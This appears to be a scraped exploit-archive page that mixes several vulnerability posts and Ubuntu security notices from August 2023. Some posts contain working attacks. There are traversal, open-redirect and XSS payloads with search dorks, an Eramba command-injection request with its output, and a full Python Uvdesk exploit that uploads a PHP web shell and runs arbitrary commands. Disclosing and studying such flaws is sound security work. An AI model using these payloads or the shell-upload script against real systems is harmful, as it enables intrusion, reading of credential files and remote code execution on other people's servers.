CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Eramba 3.19.1 Remote Command Execution

Ubuntu Security Notice 6266-1 - Zac Sims discovered that librsvg incorrectly handled decoding URLs. A remote attacker could possibly use this issue to read arbitrary files by using an include element.

==========================================================================  
Ubuntu Security Notice USN-6266-1  
August 01, 2023

librsvg vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

librsvg could be made to expose sensitive information.

Software Description:  
- librsvg: renderer library for SVG files

Details:

Zac Sims discovered that librsvg incorrectly handled decoding URLs. A  
remote attacker could possibly use this issue to read arbitrary files by  
using an include element.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   librsvg2-2                      2.54.5+dfsg-1ubuntu2.1

Ubuntu 22.04 LTS:  
   librsvg2-2                      2.52.5+dfsg-3ubuntu0.2

Ubuntu 20.04 LTS:  
   librsvg2-2                      2.48.9-1ubuntu0.20.04.4

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6266-1  
   CVE-2023-38633

Package Information:  
   https://launchpad.net/ubuntu/+source/librsvg/2.54.5+dfsg-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/librsvg/2.52.5+dfsg-3ubuntu0.2  
   https://launchpad.net/ubuntu/+source/librsvg/2.48.9-1ubuntu0.20.04.4

Ubuntu Security Notice USN-6266-1

Uvdesk version 1.1.3 suffers from a remote shell upload vulnerability.

    # Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)# Date: 28/07/2023# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com# Software Link: https://github.com/uvdesk/community-skeleton# Version: 1.1.3# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"# CVE : CVE-2023-39147# Tested on: Ubuntu 20.04.6import requestsimport argparsedef get_args():    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')    my_args = parser.parse_args()    return my_argsdef main():    args = get_args()    base_url = args.url    command = args.command    uploaded_file = "shell.php"    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command# Edit your credentials here    login_data = {        "_username": "admin@adm.com",        "_password": "passwd",        "_remember_me": "off"    }    files = {        "name": (None, "pwn"),        "description": (None, "xxt"),        "visibility": (None, "public"),        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")    }    s = requests.session()    # Login    s.post(base_url + "/en/member/login", data=login_data)    # Upload    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)    # Execute command    cmd = s.get(url_cmd)    print(cmd.text)if __name__ == "__main__":    main()

Uvdesk 1.1.3 Shell Upload

Ubuntu Security Notice 6263-1 - Motoyasu Saburi discovered that OpenJDK incorrectly handled special characters in file name parameters. An attacker could possibly use this issue to insert, edit or obtain sensitive information. This issue only affected OpenJDK 11 and OpenJDK 17. Eirik Bjørsnøs discovered that OpenJDK incorrectly handled certain ZIP archives. An attacker could possibly use this issue to cause a denial of service. This issue only affected OpenJDK 11 and OpenJDK 17.

==========================================================================  
Ubuntu Security Notice USN-6263-1  
August 01, 2023

openjdk-8, openjdk-lts, openjdk-17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in OpenJDK.

Software Description:  
- openjdk-17: Open Source Java implementation  
- openjdk-8: Open Source Java implementation  
- openjdk-lts: Open Source Java implementation

Details:

Motoyasu Saburi discovered that OpenJDK incorrectly handled special  
characters in file name parameters. An attacker could possibly use  
this issue to insert, edit or obtain sensitive information. This issue  
only affected OpenJDK 11 and OpenJDK 17. (CVE-2023-22006)

Eirik Bjørsnøs discovered that OpenJDK incorrectly handled certain ZIP  
archives. An attacker could possibly use this issue to cause a denial  
of service. This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-22036)

David Stancu discovered that OpenJDK had a flaw in the AES cipher  
implementation. An attacker could possibly use this issue to obtain  
sensitive information. This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-22041)

Zhiqiang Zang discovered that OpenJDK incorrectly handled array accesses  
when using the binary '%' operator. An attacker could possibly use this  
issue to obtain sensitive information. This issue only affected OpenJDK 17.  
(CVE-2023-22044)

Zhiqiang Zang discovered that OpenJDK incorrectly handled array accesses.  
An attacker could possibly use this issue to obtain sensitive information.  
(CVE-2023-22045)

It was discovered that OpenJDK incorrectly sanitized URIs strings. An  
attacker could possibly use this issue to insert, edit or obtain sensitive  
information. (CVE-2023-22049)

It was discovered that OpenJDK incorrectly handled certain glyphs. An  
attacker could possibly use this issue to cause a denial of service.  
This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-25193)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~23.04  
  openjdk-17-jdk                  17.0.8+7-1~23.04  
  openjdk-17-jre                  17.0.8+7-1~23.04  
  openjdk-17-jre-headless         17.0.8+7-1~23.04  
  openjdk-17-jre-zero             17.0.8+7-1~23.04  
  openjdk-8-jdk                   8u382-ga-1~23.04.1  
  openjdk-8-jre                   8u382-ga-1~23.04.1  
  openjdk-8-jre-headless          8u382-ga-1~23.04.1  
  openjdk-8-jre-zero              8u382-ga-1~23.04.1

Ubuntu 22.04 LTS:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~22.04  
  openjdk-17-jdk                  17.0.8+7-1~22.04  
  openjdk-17-jre                  17.0.8+7-1~22.04  
  openjdk-17-jre-headless         17.0.8+7-1~22.04  
  openjdk-17-jre-zero             17.0.8+7-1~22.04  
  openjdk-8-jdk                   8u382-ga-1~22.04.1  
  openjdk-8-jre                   8u382-ga-1~22.04.1  
  openjdk-8-jre-headless          8u382-ga-1~22.04.1  
  openjdk-8-jre-zero              8u382-ga-1~22.04.1

Ubuntu 20.04 LTS:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~20.04  
  openjdk-17-jdk                  17.0.8+7-1~20.04.2  
  openjdk-17-jre                  17.0.8+7-1~20.04.2  
  openjdk-17-jre-headless         17.0.8+7-1~20.04.2  
  openjdk-17-jre-zero             17.0.8+7-1~20.04.2  
  openjdk-8-jdk                   8u382-ga-1~20.04.1  
  openjdk-8-jre                   8u382-ga-1~20.04.1  
  openjdk-8-jre-headless          8u382-ga-1~20.04.1  
  openjdk-8-jre-zero              8u382-ga-1~20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~18.04  
  openjdk-17-jdk                  17.0.8+7-1~18.04  
  openjdk-17-jre                  17.0.8+7-1~18.04  
  openjdk-17-jre-headless         17.0.8+7-1~18.04  
  openjdk-17-jre-zero             17.0.8+7-1~18.04  
  openjdk-8-jdk                   8u382-ga-1~18.04.1  
  openjdk-8-jre                   8u382-ga-1~18.04.1  
  openjdk-8-jre-headless          8u382-ga-1~18.04.1  
  openjdk-8-jre-zero              8u382-ga-1~18.04.1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  openjdk-8-jdk                   8u382-ga-1~16.04.1  
  openjdk-8-jre                   8u382-ga-1~16.04.1  
  openjdk-8-jre-headless          8u382-ga-1~16.04.1  
  openjdk-8-jre-zero              8u382-ga-1~16.04.1

This update uses a new upstream release, which includes additional  
bug fixes. After a standard system update you need to restart any  
Java applications or applets to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6263-1  
  CVE-2023-22006, CVE-2023-22036, CVE-2023-22041, CVE-2023-22044,  
  CVE-2023-22045, CVE-2023-22049, CVE-2023-25193

Package Information:  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~23.04  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~23.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~23.04  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~22.04  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~22.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~22.04  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~20.04.2  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~20.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~20.04

Ubuntu Security Notice USN-6263-1

Ubuntu Security Notice 6242-2 - USN-6242-1 fixed a vulnerability in OpenSSH. This update provides the corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS. It was discovered that OpenSSH incorrectly handled loading certain PKCS#11 providers. If a user forwarded their ssh-agent to an untrusted system, a remote attacker could possibly use this issue to load arbitrary libraries from the user's system and execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6242-2  
July 31, 2023

openssh vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

OpenSSH could be made to run programs as your login when using ssh-agent  
forwarding.

Software Description:  
- openssh: secure shell (SSH) for secure access to remote machines

Details:

USN-6242-1 fixed a vulnerability in OpenSSH. This update provides  
the corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS,  
and Ubuntu 18.04 LTS.

Original advisory details:

 It was discovered that OpenSSH incorrectly handled loading certain PKCS#11  
 providers. If a user forwarded their ssh-agent to an untrusted system, a  
 remote attacker could possibly use this issue to load arbitrary libraries  
 from the user's system and execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:7.6p1-4ubuntu0.7+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:7.2p2-4ubuntu2.10+esm3

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  openssh-client                  1:6.6p1-2ubuntu2.13+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6242-2  
  https://ubuntu.com/security/notices/USN-6242-1  
  CVE-2023-38408

Ubuntu Security Notice USN-6242-2

Ubuntu Security Notice 6264-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6264-1July 31, 2023webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   libjavascriptcoregtk-4.0-18     2.40.4-0ubuntu0.23.04.1   libjavascriptcoregtk-4.1-0      2.40.4-0ubuntu0.23.04.1   libjavascriptcoregtk-6.0-1      2.40.4-0ubuntu0.23.04.1   libwebkit2gtk-4.0-37            2.40.4-0ubuntu0.23.04.1   libwebkit2gtk-4.1-0             2.40.4-0ubuntu0.23.04.1   libwebkitgtk-6.0-4              2.40.4-0ubuntu0.23.04.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.40.4-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.40.4-0ubuntu0.22.04.1   libjavascriptcoregtk-6.0-1      2.40.4-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.40.4-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.40.4-0ubuntu0.22.04.1   libwebkitgtk-6.0-4              2.40.4-0ubuntu0.22.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6264-1   CVE-2023-28204, CVE-2023-32373, CVE-2023-32393, CVE-2023-32435,   CVE-2023-32439, CVE-2023-37450Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.4-0ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.40.4-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6264-1

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

**City Variety LMS 2.2 Cross Site Scripting**

Posted Aug 1, 2023

Authored by indoushka

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 1cbbe0f2970a91c54fd6b773983a7f83c535dbf1c4e56f12913660cbe435877e

Download | Favorite | View

**City Variety LMS 2.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : cityvariety LMS 2.2 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.cityvariety.co.th/                                                                                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name=[+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name=Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,831)
*   Arbitrary (16,174)
*   BBS (2,859)
*   Bypass (1,738)
*   CGI (1,026)
*   Code Execution (7,261)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,337)
*   DoS (23,388)
*   Encryption (2,369)
*   Exploit (51,723)
*   File Inclusion (4,219)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (855)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,596)
*   Python (1,532)
*   Remote (30,710)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,335)
*   TCP (2,402)
*   Trojan (687)
*   UDP (889)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,634)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,892)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,326)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,644)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,787)
*   UNIX (9,281)
*   UnixWare (186)
*   Windows (6,566)
*   Other

City Variety LMS 2.2 Cross Site Scripting

Ubuntu Security Notice 6262-1 - It was discovered that Wireshark did not properly handle certain NFS packages when certain configuration options were enabled. An attacker could possibly use this issue to cause Wireshark to crash, resulting in a denial of service. It was discovered that Wireshark did not properly handle certain GVCP packages. An attacker could possibly use this issue to cause Wireshark to crash, resulting in a denial of service. This issue only affected Ubuntu 20.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6262-1  
July 31, 2023

wireshark vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Wireshark.

Software Description:  
- wireshark: network traffic analyzer - meta-package

Details:

It was discovered that Wireshark did not properly handle certain  
NFS packages when certain configuration options were enabled.  
An attacker could possibly use this issue to cause  
Wireshark to crash, resulting in a denial of service. (CVE-2020-13164)

It was discovered that Wireshark did not properly handle certain GVCP  
packages. An attacker could possibly use this issue to cause  
Wireshark to crash, resulting in a denial of service. This issue only  
affected Ubuntu 20.04 LTS. (CVE-2020-15466)

It was discovered that Wireshark did not properly handle certain  
Kafka packages. An attacker could possibly use this issue to cause  
Wireshark to crash, resulting in a denial of service. This issue only  
affected Ubuntu 20.04 LTS. (CVE-2020-17498)

It was discovered that Wireshark did not properly handle certain TCP  
packages containing an invalid 0xFFFF checksum. An attacker could  
possibly use this issue to cause Wireshark to crash, resulting in  
a denial of service. (CVE-2020-25862)

It was discovered that Wireshark did not properly handle certain  
MIME packages containing invalid parts. An attacker could  
possibly use this issue to cause Wireshark to crash, resulting in  
a denial of service. (CVE-2020-25863)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   libwireshark13                  3.2.3-1ubuntu0.1~esm1  
